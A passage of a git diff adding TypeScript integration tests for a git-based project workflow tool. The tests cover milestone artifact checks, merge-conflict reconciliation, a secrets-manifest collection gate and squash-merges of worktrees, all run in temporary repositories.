+  mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+  writeFileSync(join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "# Roadmap");
+  writeFileSync(join(base, ".gsd", "milestones", "M001", "M001-SUMMARY.md"), "# Summary");
+  execFileSync("git", ["add", "."], { cwd: base, stdio: "ignore" });
+  execFileSync("git", ["commit", "-m", "chore: add plan files"], { cwd: base, stdio: "ignore" });
+
+  const result = hasImplementationArtifacts(base);
+  assert.equal(result, "absent", "should return 'absent' when only .gsd/ files were committed");
+});
+
+test("hasImplementationArtifacts returns 'present' when implementation files committed (#1703)", (t) => {
+  const base = makeGitBase();
+  t.after(() => cleanup(base));
+
+  // Create a feature branch with both .gsd/ and implementation files
+  execFileSync("git", ["checkout", "-b", "feat/test-impl"], { cwd: base, stdio: "ignore" });
+  mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+  writeFileSync(join(base, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "# Roadmap");
+  mkdirSync(join(base, "src"), { recursive: true });
+  writeFileSync(join(base, "src", "feature.ts"), "export function feature() {}");
+  execFileSync("git", ["add", "."], { cwd: base, stdio: "ignore" });
+  execFileSync("git", ["commit", "-m", "feat: add feature"], { cwd: base, stdio: "ignore" });
+
+  const result = hasImplementationArtifacts(base);
+  assert.equal(result, "present", "should return 'present' when implementation files are present");
+});
+
+test("hasImplementationArtifacts returns 'unknown' on non-git directory (fail-open)", (t) => {
+  const base = join(tmpdir(), `gsd-test-nogit-${randomUUID()}`);
+  mkdirSync(base, { recursive: true });
+  t.after(() => cleanup(base));
+
+  const result = hasImplementationArtifacts(base);
+  assert.equal(result, "unknown", "should return 'unknown' (fail-open) in non-git directory");
+});
+
+// ─── verifyExpectedArtifact: complete-milestone requires impl artifacts (#1703) ──
+
+test("verifyExpectedArtifact complete-milestone fails with only .gsd/ files (#1703)", (t) => {
+  const base = makeGitBase();
+  t.after(() => cleanup(base));
+
+  // Create feature branch with only .gsd/ files
+  execFileSync("git", ["checkout", "-b", "feat/ms-only-gsd"], { cwd: base, stdio: "ignore" });
+  mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+  writeFileSync(join(base, ".gsd", "milestones", "M001", "M001-SUMMARY.md"), "# Milestone Summary\nDone.");
+  execFileSync("git", ["add", "."], { cwd: base, stdio: "ignore" });
+  execFileSync("git", ["commit", "-m", "chore: milestone plan files"], { cwd: base, stdio: "ignore" });
+
+  const result = verifyExpectedArtifact("complete-milestone", "M001", base);
+  assert.equal(result, false, "complete-milestone should fail verification when only .gsd/ files present");
+});
+
+// ─── reconcileMergeState: silent nativeCommit failure (#2542) ─────────────
+
+function makeMockCtx(): { ctx: any; notifications: Array<{ msg: string; level: string }> } {
+  const notifications: Array<{ msg: string; level: string }> = [];
+  const ctx = {
+    ui: {
+      notify(msg: string, level: string) {
+        notifications.push({ msg, level });
+      },
+    },
+  };
+  return { ctx, notifications };
+}
+
+test("reconcileMergeState returns blocked and notifies error when nativeCommit fails (#2542)", (t) => {
+  const base = makeGitBase();
+  t.after(() => cleanup(base));
+
+  // Create a second branch with a commit, then start a merge on main
+  execFileSync("git", ["checkout", "-b", "feature"], { cwd: base, stdio: "ignore" });
+  writeFileSync(join(base, "feature.txt"), "feature content");
+  execFileSync("git", ["add", "."], { cwd: base, stdio: "ignore" });
+  execFileSync("git", ["commit", "-m", "add feature"], { cwd: base, stdio: "ignore" });
+  execFileSync("git", ["checkout", "main"], { cwd: base, stdio: "ignore" });
+
+  // Start merge (no conflicts — fast path with MERGE_HEAD)
+  execFileSync("git", ["merge", "--no-ff", "--no-commit", "feature"], { cwd: base, stdio: "ignore" });
+
+  // Verify MERGE_HEAD exists
+  assert.ok(existsSync(join(base, ".git", "MERGE_HEAD")), "MERGE_HEAD should exist");
+
+  // Make .git/objects read-only so git cannot write the commit object,
+  // causing nativeCommit to throw a non-"nothing to commit" error.
+  const objectsDir = join(base, ".git", "objects");
+  chmodSync(objectsDir, 0o444);
+  t.after(() => { try { chmodSync(objectsDir, 0o755); } catch { /* cleanup */ } });
+
+  const { ctx, notifications } = makeMockCtx();
+  const result = reconcileMergeState(base, ctx);
+
+  assert.equal(result, "blocked", "reconcileMergeState should return blocked when nativeCommit fails");
+  const errorNotifications = notifications.filter(n => n.level === "error");
+  assert.ok(errorNotifications.length > 0, "should notify an error when nativeCommit fails");
+  assert.ok(
+    errorNotifications[0].msg.includes("Failed to finalize"),
+    "error notification should describe the commit failure",
+  );
+});
+
+test("reconcileMergeState returns clean when no merge state present", (t) => {
+  const base = makeGitBase();
+  t.after(() => cleanup(base));
+
+  const { ctx, notifications } = makeMockCtx();
+  const result = reconcileMergeState(base, ctx);
+
+  assert.equal(result, "clean", "should return clean when no merge state exists");
+  assert.equal(notifications.length, 0, "should not notify when no merge state present");
+});
+
+test("reconcileMergeState blocks and preserves unresolved code conflicts", (t) => {
+  const base = makeGitBase();
+  t.after(() => cleanup(base));
+
+  writeFileSync(join(base, "conflict.txt"), "base\n");
+  execFileSync("git", ["add", "conflict.txt"], { cwd: base, stdio: "ignore" });
+  execFileSync("git", ["commit", "-m", "add conflict base"], { cwd: base, stdio: "ignore" });
+
+  execFileSync("git", ["checkout", "-b", "feature"], { cwd: base, stdio: "ignore" });
+  writeFileSync(join(base, "conflict.txt"), "feature\n");
+  execFileSync("git", ["add", "conflict.txt"], { cwd: base, stdio: "ignore" });
+  execFileSync("git", ["commit", "-m", "feature change"], { cwd: base, stdio: "ignore" });
+
+  execFileSync("git", ["checkout", "main"], { cwd: base, stdio: "ignore" });
+  writeFileSync(join(base, "conflict.txt"), "main\n");
+  execFileSync("git", ["add", "conflict.txt"], { cwd: base, stdio: "ignore" });
+  execFileSync("git", ["commit", "-m", "main change"], { cwd: base, stdio: "ignore" });
+
+  let mergeFailed = false;
+  try {
+    execFileSync("git", ["merge", "--no-ff", "feature"], { cwd: base, stdio: "ignore" });
+  } catch {
+    mergeFailed = true;
+  }
+  assert.equal(mergeFailed, true, "merge should produce a conflict");
+  assert.ok(existsSync(join(base, ".git", "MERGE_HEAD")), "MERGE_HEAD should remain present before reconcile");
+
+  const beforeContents = readFileSync(join(base, "conflict.txt"), "utf8");
+  assert.match(beforeContents, /<<<<<<<|=======|>>>>>>>/, "fixture should contain conflict markers");
+
+  const { ctx, notifications } = makeMockCtx();
+  const result = reconcileMergeState(base, ctx);
+
+  assert.equal(result, "blocked", "code conflicts should block reconciliation");
+  assert.ok(existsSync(join(base, ".git", "MERGE_HEAD")), "MERGE_HEAD should be preserved for manual resolution");
+  assert.equal(
+    readFileSync(join(base, "conflict.txt"), "utf8"),
+    beforeContents,
+    "reconcile should preserve the conflicted file contents",
+  );
+  assert.ok(
+    notifications.some((n) => n.level === "error" && n.msg.includes("manual conflict resolution is preserved")),
+    "should notify that auto-mode paused and preserved manual work",
+  );
+});
+
+test("verifyExpectedArtifact complete-milestone passes with impl files (#1703)", (t) => {
+  const base = makeGitBase();
+  t.after(() => cleanup(base));
+
+  // Create feature branch with implementation files AND milestone summary
+  execFileSync("git", ["checkout", "-b", "feat/ms-with-impl"], { cwd: base, stdio: "ignore" });
+  mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+  writeFileSync(join(base, ".gsd", "milestones", "M001", "M001-SUMMARY.md"), "# Milestone Summary\nDone.");
+  mkdirSync(join(base, "src"), { recursive: true });
+  writeFileSync(join(base, "src", "app.ts"), "console.log('hello');");
+  execFileSync("git", ["add", "."], { cwd: base, stdio: "ignore" });
+  execFileSync("git", ["commit", "-m", "feat: implementation"], { cwd: base, stdio: "ignore" });
+
+  const result = verifyExpectedArtifact("complete-milestone", "M001", base);
+  assert.equal(result, true, "complete-milestone should pass verification with implementation files");
+});
diff --git a/src/resources/extensions/gsd/tests/integration/auto-secrets-gate.test.ts b/src/resources/extensions/gsd/tests/integration/auto-secrets-gate.test.ts
new file mode 100644
index 000000000..6807647cf
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/auto-secrets-gate.test.ts
@@ -0,0 +1,194 @@
+/**
+ * Integration tests for the secrets collection gate in startAuto().
+ *
+ * Exercises getManifestStatus() → collectSecretsFromManifest() composition
+ * end-to-end using real filesystem state. Proves the three gate paths:
+ *   1. No manifest exists — gate skips silently
+ *   2. Pending keys exist — gate triggers collection
+ *   3. No pending keys — gate skips silently
+ *
+ * Uses temp directories with real .gsd/milestones/M001/ structure, mirroring
+ * the pattern from manifest-status.test.ts.
+ */
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdirSync, writeFileSync, readFileSync, rmSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+import { getManifestStatus } from '../../files.ts';
+import { collectSecretsFromManifest } from '../../../get-secrets-from-user.ts';
+
+function makeTempDir(prefix: string): string {
+  const dir = join(tmpdir(), `${prefix}-${Date.now()}-${Math.random().toString(36).slice(2)}`);
+  mkdirSync(dir, { recursive: true });
+  return dir;
+}
+
+/** Create the .gsd/milestones/M001/ directory structure and write a secrets manifest. */
+function writeManifest(base: string, content: string): void {
+  const mDir = join(base, '.gsd', 'milestones', 'M001');
+  mkdirSync(mDir, { recursive: true });
+  writeFileSync(join(mDir, 'M001-SECRETS.md'), content);
+}
+
+/** Stub ctx with hasUI: false — collectOneSecret returns null (skip), showSecretsSummary is a no-op. */
+function makeNoUICtx(cwd: string) {
+  return {
+    ui: {},
+    hasUI: false,
+    cwd,
+  };
+}
+
+// ─── Scenario 1: No manifest exists ──────────────────────────────────────────
+
+test('secrets gate: no manifest exists — getManifestStatus returns null', async (t) => {
+  const tmp = makeTempDir('gate-no-manifest');
+  t.after(() => rmSync(tmp, { recursive: true, force: true }));
+
+  // No .gsd directory at all
+  const result = await getManifestStatus(tmp, 'M001');
+  assert.strictEqual(result, null, 'should return null when no manifest file exists');
+});
+
+// ─── Scenario 2: Pending keys exist ─────────────────────────────────────────
+
+test('secrets gate: pending keys exist — gate triggers collection, manifest updated on disk', async (t) => {
+  const tmp = makeTempDir('gate-pending');
+  const savedA = process.env.GSD_GATE_TEST_EXISTING;
+  t.after(() => {
+    delete process.env.GSD_GATE_TEST_EXISTING;
+    if (savedA !== undefined) process.env.GSD_GATE_TEST_EXISTING = savedA;
+    delete process.env.GSD_GATE_TEST_PEND_A;
+    delete process.env.GSD_GATE_TEST_PEND_B;
+    rmSync(tmp, { recursive: true, force: true });
+  });
+
+  // Simulate one key already in env
+  process.env.GSD_GATE_TEST_EXISTING = 'already-here';
+
+  // Ensure pending keys are NOT in env
+  delete process.env.GSD_GATE_TEST_PEND_A;
+  delete process.env.GSD_GATE_TEST_PEND_B;
+
+  writeManifest(tmp, `# Secrets Manifest
+
+**Milestone:** M001
+**Generated:** 2025-06-20T10:00:00Z
+
+### GSD_GATE_TEST_PEND_A
+
+**Service:** ServiceA
+**Status:** pending
+**Destination:** dotenv
+
+1. Get key A from dashboard
+
+### GSD_GATE_TEST_PEND_B
+
+**Service:** ServiceB
+**Status:** pending
+**Destination:** dotenv
+
+1. Get key B from dashboard
+
+### GSD_GATE_TEST_EXISTING
+
+**Service:** ServiceC
+**Status:** pending
+**Destination:** dotenv
+
+1. Already in env
+`);
+
+  // (a) Verify getManifestStatus shows pending keys
+  const status = await getManifestStatus(tmp, 'M001');
+  assert.notStrictEqual(status, null, 'manifest should exist');
+  assert.ok(status!.pending.length > 0, 'should have pending keys');
+  assert.deepStrictEqual(status!.pending, ['GSD_GATE_TEST_PEND_A', 'GSD_GATE_TEST_PEND_B'], 'pending keys');
+  assert.deepStrictEqual(status!.existing, ['GSD_GATE_TEST_EXISTING'], 'existing keys');
+
+  // (b) Call collectSecretsFromManifest with no-UI context
+  // With hasUI: false, collectOneSecret returns null → pending keys become "skipped"
+  const result = await collectSecretsFromManifest(tmp, 'M001', makeNoUICtx(tmp));
+
+  // (c) Verify return shape
+  assert.deepStrictEqual(result.applied, [], 'no keys applied (no UI to enter values)');
+  assert.ok(result.skipped.includes('GSD_GATE_TEST_PEND_A'), 'PEND_A should be skipped');
+  assert.ok(result.skipped.includes('GSD_GATE_TEST_PEND_B'), 'PEND_B should be skipped');
+  assert.deepStrictEqual(result.existingSkipped, ['GSD_GATE_TEST_EXISTING']);
+
+  // (d) Verify manifest on disk was updated — pending entries that went through
+  // collection are now "skipped". The existing-in-env entry retains its manifest
+  // status ("pending") because collectSecretsFromManifest only updates entries
+  // that flow through collectOneSecret. At runtime, getManifestStatus overrides
+  // env-present entries to "existing" regardless of manifest status.
+  const manifestPath = join(tmp, '.gsd', 'milestones', 'M001', 'M001-SECRETS.md');
+  const updatedContent = readFileSync(manifestPath, 'utf8');
+  assert.ok(
+    updatedContent.includes('**Status:** skipped'),
+    'formerly-pending entries should now have status "skipped" in the manifest file',
+  );
+  // Count: PEND_A → skipped, PEND_B → skipped, EXISTING stays pending on disk
+  const skippedMatches = updatedContent.match(/\*\*Status:\*\* skipped/g);
+  assert.strictEqual(skippedMatches?.length, 2, 'two entries should have status "skipped"');
+  const pendingMatches = updatedContent.match(/\*\*Status:\*\* pending/g);
+  assert.strictEqual(pendingMatches?.length, 1, 'one entry (existing-in-env) retains pending on disk');
+
+  // (e) Verify getManifestStatus now shows no pending
+  const statusAfter = await getManifestStatus(tmp, 'M001');
+  assert.notStrictEqual(statusAfter, null);
+  assert.deepStrictEqual(statusAfter!.pending, [], 'no pending keys after collection');
+});
+
+// ─── Scenario 3: No pending keys — all collected or in env ──────────────────
+
+test('secrets gate: no pending keys — getManifestStatus shows pending.length === 0', async (t) => {
+  const tmp = makeTempDir('gate-no-pending');
+  const savedKey = process.env.GSD_GATE_TEST_ENVKEY;
+  t.after(() => {
+    delete process.env.GSD_GATE_TEST_ENVKEY;
+    if (savedKey !== undefined) process.env.GSD_GATE_TEST_ENVKEY = savedKey;
+    rmSync(tmp, { recursive: true, force: true });
+  });
+
+  process.env.GSD_GATE_TEST_ENVKEY = 'some-value';
+
+  writeManifest(tmp, `# Secrets Manifest
+
+**Milestone:** M001
+**Generated:** 2025-06-20T10:00:00Z
+
+### ALREADY_COLLECTED
+
+**Service:** ServiceX
+**Status:** collected
+**Destination:** dotenv
+
+1. Was collected previously
+
+### ALREADY_SKIPPED
+
+**Service:** ServiceY
+**Status:** skipped
+**Destination:** dotenv
+
+1. Not needed
+
+### GSD_GATE_TEST_ENVKEY
+
+**Service:** ServiceZ
+**Status:** pending
+**Destination:** dotenv
+
+1. In env already
+`);
+
+  const result = await getManifestStatus(tmp, 'M001');
+  assert.notStrictEqual(result, null, 'manifest should exist');
+  assert.deepStrictEqual(result!.pending, [], 'no pending keys — gate would skip');
+  assert.deepStrictEqual(result!.collected, ['ALREADY_COLLECTED']);
+  assert.deepStrictEqual(result!.skipped, ['ALREADY_SKIPPED']);
+  assert.deepStrictEqual(result!.existing, ['GSD_GATE_TEST_ENVKEY']);
+});
diff --git a/src/resources/extensions/gsd/tests/integration/auto-stash-merge.test.ts b/src/resources/extensions/gsd/tests/integration/auto-stash-merge.test.ts
new file mode 100644
index 000000000..71c9173fd
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/auto-stash-merge.test.ts
@@ -0,0 +1,121 @@
+/**
+ * auto-stash-merge.test.ts — Regression tests for #2151.
+ *
+ * Tests that mergeMilestoneToMain auto-stashes dirty files before squash merge,
+ * and that nativeMergeSquash returns dirty filenames from git stderr.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, readFileSync, realpathSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execSync } from "node:child_process";
+
+import { createAutoWorktree, mergeMilestoneToMain } from "../../auto-worktree.ts";
+import { nativeMergeSquash } from "../../native-git-bridge.ts";
+
+function run(cmd: string, cwd: string): string {
+  return execSync(cmd, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
+}
+
+function createTempRepo(): string {
+  const dir = realpathSync(mkdtempSync(join(tmpdir(), "wt-autostash-test-")));
+  run("git init", dir);
+  run("git config user.email test@test.com", dir);
+  run("git config user.name Test", dir);
+  writeFileSync(join(dir, "README.md"), "# test\n");
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(join(dir, ".gsd", "STATE.md"), "# State\n");
+  run("git add .", dir);
+  run("git commit -m init", dir);
+  run("git branch -M main", dir);
+  return dir;
+}
+
+function makeRoadmap(milestoneId: string, title: string, slices: Array<{ id: string; title: string }>): string {
+  const sliceLines = slices.map(s => `- [x] **${s.id}: ${s.title}**`).join("\n");
+  return `# ${milestoneId}: ${title}\n\n## Slices\n${sliceLines}\n`;
+}
+
+function addSliceToMilestone(
+  repo: string, wtPath: string, milestoneId: string,
+  sliceId: string, sliceTitle: string,
+  commits: Array<{ file: string; content: string; message: string }>,
+): void {
+  const normalizedPath = wtPath.replaceAll("\\", "/");
+  const worktreeName = normalizedPath.split("/").pop() || milestoneId;
+  const sliceBranch = `slice/${worktreeName}/${sliceId}`;
+  run(`git checkout -b "${sliceBranch}"`, wtPath);
+  for (const c of commits) {
+    writeFileSync(join(wtPath, c.file), c.content);
+    run("git add .", wtPath);
+    run(`git commit -m "${c.message}"`, wtPath);
+  }
+  const milestoneBranch = `milestone/${milestoneId}`;
+  run(`git checkout "${milestoneBranch}"`, wtPath);
+  run(`git merge --no-ff "${sliceBranch}" -m "merge ${sliceId}: ${sliceTitle}"`, wtPath);
+}
+
+test("#2151 bug 1: auto-stash unblocks merge when unrelated files are dirty", () => {
+  const repo = createTempRepo();
+  try {
+    const wtPath = createAutoWorktree(repo, "M200");
+
+    addSliceToMilestone(repo, wtPath, "M200", "S01", "Stash test", [
+      { file: "stash-test.ts", content: "export const stash = true;\n", message: "add stash test" },
+    ]);
+
+    // Dirty an unrelated tracked file in the project root — this previously
+    // blocked the squash merge with "local changes would be overwritten".
+    writeFileSync(join(repo, "README.md"), "# modified locally\n");
+
+    const roadmap = makeRoadmap("M200", "Auto-stash test", [
+      { id: "S01", title: "Stash test" },
+    ]);
+
+    // Should succeed — the dirty README.md is auto-stashed before merge.
+    const result = mergeMilestoneToMain(repo, "M200", roadmap);
+    assert.ok(result.commitMessage.includes("feat:") && result.commitMessage.includes("GSD-Milestone: M200"), "merge succeeds with dirty unrelated file");
+    assert.ok(existsSync(join(repo, "stash-test.ts")), "milestone code merged to main");
+
+    // Verify the dirty file was restored (stash popped).
+    const readmeContent = readFileSync(join(repo, "README.md"), "utf-8");
+    assert.equal(readmeContent.replace(/\r\n/g, "\n"), "# modified locally\n", "stash popped — dirty file restored after merge");
+  } finally {
+    try { rmSync(repo, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM: git holds locks on .git files */ }
+  }
+});
+
+test("#2151 bug 2: nativeMergeSquash returns dirty filenames", async () => {
+  const { nativeMergeSquash } = await import("../../native-git-bridge.ts");
+  const repo = createTempRepo();
+  try {
+    run("git checkout -b milestone/M210", repo);
+    writeFileSync(join(repo, "overlap.ts"), "export const overlap = true;\n");
+    run("git add .", repo);
+    run('git commit -m "add overlap"', repo);
+    run("git checkout main", repo);
+
+    // Create the same file as a dirty local change
+    writeFileSync(join(repo, "overlap.ts"), "// local dirty version\n");
+
+    const result = nativeMergeSquash(repo, "milestone/M210");
+    assert.equal(result.success, false, "merge reports failure");
+    assert.ok(
+      result.conflicts.includes("__dirty_working_tree__"),
+      "conflicts include __dirty_working_tree__ sentinel",
+    );
+    assert.ok(
+      Array.isArray(result.dirtyFiles) && result.dirtyFiles.length > 0,
+      "dirtyFiles array is populated",
+    );
+    assert.ok(
+      result.dirtyFiles!.includes("overlap.ts"),
+      "dirtyFiles includes the actual dirty file name",
+    );
+  } finally {
+    run("git checkout -- . 2>/dev/null || true", repo);
+    try { rmSync(repo, { recursive: true, force: true, maxRetries: 3, retryDelay: 100 }); } catch { /* Windows EPERM: git holds locks on .git files */ }
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/integration/auto-worktree-milestone-merge.test.ts b/src/resources/extensions/gsd/tests/integration/auto-worktree-milestone-merge.test.ts
new file mode 100644
index 000000000..48f5897d9
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/auto-worktree-milestone-merge.test.ts
@@ -0,0 +1,792 @@
+/**
+ * auto-worktree-milestone-merge.test.ts — Integration tests for mergeMilestoneToMain.
+ *
+ * Covers: squash-merge topology (one commit on main), rich commit message with
+ * slice titles, worktree cleanup, nothing-to-commit edge case, auto-push with
+ * bare remote. All tests use real git operations in temp repos.
+ *
+ * Note: execSync is used intentionally in these tests for git operations with
+ * controlled, hardcoded inputs (no user input). This is safe and necessary for
+ * testing real git behavior.
+ */
+
+import { describe, test, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, realpathSync, readFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import { execSync } from "node:child_process";
+
+import {
+  createAutoWorktree,
+  mergeMilestoneToMain,
+  getAutoWorktreeOriginalBase,
+} from "../../auto-worktree.ts";
+import { getSliceBranchName } from "../../worktree.ts";
+import { nativeMergeSquash } from "../../native-git-bridge.ts";
+
+function run(cmd: string, cwd: string): string {
+  // Safe: all inputs are hardcoded test strings, not user input
+  return execSync(cmd, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
+}
+
+function createTempRepo(): string {
+  const dir = realpathSync(mkdtempSync(join(tmpdir(), "wt-ms-merge-test-")));
+  run("git init", dir);
+  run("git config user.email test@test.com", dir);
+  run("git config user.name Test", dir);
+  writeFileSync(join(dir, "README.md"), "# test\n");
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  writeFileSync(join(dir, ".gsd", "STATE.md"), "# State\n");
+  run("git add .", dir);
+  run("git commit -m init", dir);
+  run("git branch -M main", dir);
+  return dir;
+}
+
+/** Minimal roadmap content for mergeMilestoneToMain. */
+function makeRoadmap(milestoneId: string, title: string, slices: Array<{ id: string; title: string }>): string {
+  const sliceLines = slices.map(s => `- [x] **${s.id}: ${s.title}**`).join("\n");
+  return `# ${milestoneId}: ${title}\n\n## Slices\n${sliceLines}\n`;
+}
+
+/** Set up a slice branch on the worktree, add commits, merge it --no-ff to milestone. */
+function addSliceToMilestone(
+  repo: string,
+  wtPath: string,
+  milestoneId: string,
+  sliceId: string,
+  sliceTitle: string,
+  commits: Array<{ file: string; content: string; message: string }>,
+): void {
+  const normalizedPath = wtPath.replaceAll("\\", "/");
+  const marker = "/.gsd/worktrees/";
+  const idx = normalizedPath.indexOf(marker);
+  const worktreeName = idx !== -1 ? normalizedPath.slice(idx + marker.length).split("/")[0] : null;
+
+  const sliceBranch = getSliceBranchName(milestoneId, sliceId, worktreeName);
+
+  run(`git checkout -b ${sliceBranch}`, wtPath);
+  for (const c of commits) {
+    writeFileSync(join(wtPath, c.file), c.content);
+    run("git add .", wtPath);
+    run(`git commit -m "${c.message}"`, wtPath);
+  }
+  run(`git checkout milestone/${milestoneId}`, wtPath);
+  run(`git merge --no-ff ${sliceBranch} -m "feat(${milestoneId}/${sliceId}): ${sliceTitle}"`, wtPath);
+  run(`git branch -d ${sliceBranch}`, wtPath);
+}
+
+describe("auto-worktree-milestone-merge", { timeout: 300_000 }, () => {
+  const savedCwd = process.cwd();
+  const tempDirs: string[] = [];
+
+  function freshRepo(): string {
+    const d = createTempRepo();
+    tempDirs.push(d);
+    return d;
+  }
+
+  afterEach(() => {
+    process.chdir(savedCwd);
+    for (const d of tempDirs) {
+      if (existsSync(d)) rmSync(d, { recursive: true, force: true });
+    }
+    tempDirs.length = 0;
+  });
+
+  test("basic squash merge — one commit on main", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M010");
+
+    addSliceToMilestone(repo, wtPath, "M010", "S01", "Auth module", [
+      { file: "auth.ts", content: "export const auth = true;\n", message: "add auth" },
+      { file: "auth-utils.ts", content: "export const hash = () => {};\n", message: "add auth utils" },
+    ]);
+    addSliceToMilestone(repo, wtPath, "M010", "S02", "User dashboard", [
+      { file: "dashboard.ts", content: "export const dash = true;\n", message: "add dashboard" },
+      { file: "widgets.ts", content: "export const widgets = [];\n", message: "add widgets" },
+    ]);
+
+    const roadmap = makeRoadmap("M010", "User management", [
+      { id: "S01", title: "Auth module" },
+      { id: "S02", title: "User dashboard" },
+    ]);
+
+    const mainLogBefore = run("git log --oneline main", repo);
+    const mainCommitCountBefore = mainLogBefore.split("\n").length;
+
+    const result = mergeMilestoneToMain(repo, "M010", roadmap);
+
+    const mainLog = run("git log --oneline main", repo);
+    const mainCommitCountAfter = mainLog.split("\n").length;
+    assert.strictEqual(mainCommitCountAfter, mainCommitCountBefore + 1, "exactly one new commit on main");
+
+    const branches = run("git branch", repo);
+    assert.ok(!branches.includes("milestone/M010"), "milestone branch deleted");
+
+    const worktreeDir = join(repo, ".gsd", "worktrees", "M010");
+    assert.ok(!existsSync(worktreeDir), "worktree directory removed");
+
+    assert.strictEqual(getAutoWorktreeOriginalBase(), null, "originalBase cleared after merge");
+
+    assert.ok(existsSync(join(repo, "auth.ts")), "auth.ts on main");
+    assert.ok(existsSync(join(repo, "dashboard.ts")), "dashboard.ts on main");
+    assert.ok(existsSync(join(repo, "widgets.ts")), "widgets.ts on main");
+
+    assert.ok(result.commitMessage.length > 0, "commitMessage returned");
+    assert.strictEqual(typeof result.pushed, "boolean", "pushed is boolean");
+  });
+
+  test("rich commit message format", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M020");
+
+    addSliceToMilestone(repo, wtPath, "M020", "S01", "Core API", [
+      { file: "api.ts", content: "export const api = true;\n", message: "add api" },
+    ]);
+    addSliceToMilestone(repo, wtPath, "M020", "S02", "Error handling", [
+      { file: "errors.ts", content: "export class AppError {}\n", message: "add errors" },
+    ]);
+    addSliceToMilestone(repo, wtPath, "M020", "S03", "Logging infra", [
+      { file: "logger.ts", content: "export const log = () => {};\n", message: "add logger" },
+    ]);
+
+    const roadmap = makeRoadmap("M020", "Backend foundation", [
+      { id: "S01", title: "Core API" },
+      { id: "S02", title: "Error handling" },
+      { id: "S03", title: "Logging infra" },
+    ]);
+
+    const result = mergeMilestoneToMain(repo, "M020", roadmap);
+
+    assert.match(result.commitMessage, /^feat:/, "subject has conventional commit prefix without milestone ID");
+    assert.ok(result.commitMessage.includes("Backend foundation"), "subject includes milestone title");
+    assert.ok(result.commitMessage.includes("- S01: Core API"), "body lists S01");
+    assert.ok(result.commitMessage.includes("- S02: Error handling"), "body lists S02");
+    assert.ok(result.commitMessage.includes("- S03: Logging infra"), "body lists S03");
+    assert.ok(result.commitMessage.includes("GSD-Milestone: M020"), "body has GSD-Milestone trailer");
+    assert.ok(result.commitMessage.includes("Branch: milestone/M020"), "body has branch metadata");
+
+    const gitMsg = run("git log -1 --format=%B main", repo).trim();
+    assert.match(gitMsg, /^feat:/, "git commit message starts with feat:");
+    assert.ok(gitMsg.includes("GSD-Milestone: M020"), "git commit has GSD-Milestone trailer");
+    assert.ok(gitMsg.includes("- S01: Core API"), "git commit body has S01");
+  });
+
+  test("nothing to commit — safe when no code changes (#1738, #1792)", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M030");
+    const roadmap = makeRoadmap("M030", "Empty milestone", []);
+
+    let threw = false;
+    let errorMsg = "";
+    try {
+      mergeMilestoneToMain(repo, "M030", roadmap);
+    } catch (err: unknown) {
+      threw = true;
+      errorMsg = err instanceof Error ? err.message : String(err);
+    }
+    assert.ok(!threw, `safe empty milestone should not throw (got: ${errorMsg})`);
+
+    const mainLog = run("git log --oneline main", repo);
+    assert.strictEqual(mainLog.split("\n").length, 1, "main still has only init commit");
+  });
+
+  test("auto-push with bare remote", () => {
+    const repo = freshRepo();
+
+    const bareDir = realpathSync(mkdtempSync(join(tmpdir(), "wt-ms-bare-")));
+    tempDirs.push(bareDir);
+    run("git init --bare", bareDir);
+    run(`git remote add origin ${bareDir}`, repo);
+    run("git push -u origin main", repo);
+
+    const wtPath = createAutoWorktree(repo, "M040");
+
+    addSliceToMilestone(repo, wtPath, "M040", "S01", "Push test", [
+      { file: "pushed.ts", content: "export const pushed = true;\n", message: "add pushed file" },
+    ]);
+
+    const roadmap = makeRoadmap("M040", "Push verification", [
+      { id: "S01", title: "Push test" },
+    ]);
+
+    const result = mergeMilestoneToMain(repo, "M040", roadmap);
+
+    const mainLog = run("git log --oneline main", repo);
+    assert.ok(mainLog.includes("feat:"), "milestone commit on main");
+
+    run("git push origin main", repo);
+    const remoteLog = run("git log --oneline main", bareDir);
+    assert.ok(remoteLog.includes("feat:"), "milestone commit reachable on remote after manual push");
+
+    assert.strictEqual(typeof result.pushed, "boolean", "pushed flag remains boolean");
+  });
+
+  test("auto-resolve .gsd/ state file conflicts", () => {
+    const repo = freshRepo();
+    const wtPath = createAutoWorktree(repo, "M050");
+
+    addSliceToMilestone(repo, wtPath, "M050", "S01", "Conflict test", [
+      { file: "feature.ts", content: "export const feature = true;\n", message: "add feature" },
+    ]);
+
+    writeFileSync(join(wtPath, ".gsd", "STATE.md"), "# State\n\n## Updated on milestone branch\n");
+    run("git add .", wtPath);
+    run('git commit -m "chore: update state on milestone branch"', wtPath);
+
+    run("git checkout main", repo);
+    writeFileSync(join(repo, ".gsd", "STATE.md"), "# State\n\n## Updated on main\n");
+    run("git add .", repo);
+    run('git commit -m "chore: update state on main"', repo);
+
+    process.chdir(wtPath);
+
+    const roadmap = makeRoadmap("M050", "Conflict resolution", [
+      { id: "S01", title: "Conflict test" },
+    ]);
+
+    let threw = false;
+    try {
